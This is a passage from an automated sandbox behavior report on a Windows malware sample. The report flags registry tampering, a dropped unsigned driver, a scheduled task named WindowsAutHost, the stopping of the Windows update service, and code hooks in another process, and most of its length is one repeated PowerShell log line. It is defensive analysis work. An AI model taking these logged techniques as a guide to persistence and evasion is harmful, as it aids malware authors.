    Source: initial sampleStatic PE information: section where entry point is pointing to: .u4~
    Source: WindowsAutHost.0.drStatic PE information: real checksum: 0x96d469 should be: 0x96d46a

    Persistence and Installation Behavior

    barindex
    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Sample is not signed and drops a device driver
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
    Creates files in the system32 config directory
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeFile created: C:\Program Files\WindowsServices\WindowsAutHostJump to dropped file
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile created: C:\Windows\Temp\34E5.tmpJump to dropped file
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeFile created: C:\Program Files\WindowsServices\WindowsAutHostJump to dropped file
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile created: C:\Windows\Temp\34E5.tmpJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

    Hooking and other Techniques for Hiding and Protection

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeMemory written: PID: 5800 base: 7FF89AD50008 value: E9 7B A9 EA FF Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeMemory written: PID: 5800 base: 7FF89ABFA980 value: E9 90 56 15 00 Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostMemory written: PID: 964 base: 7FF89AD50008 value: E9 7B A9 EA FF Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostMemory written: PID: 964 base: 7FF89ABFA980 value: E9 90 56 15 00 Jump to behavior
    Found hidden mapped module (file has been removed from disk)
    Source: C:\Program Files\WindowsServices\WindowsAutHostModule Loaded: C:\WINDOWS\TEMP\34E5.TMP
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
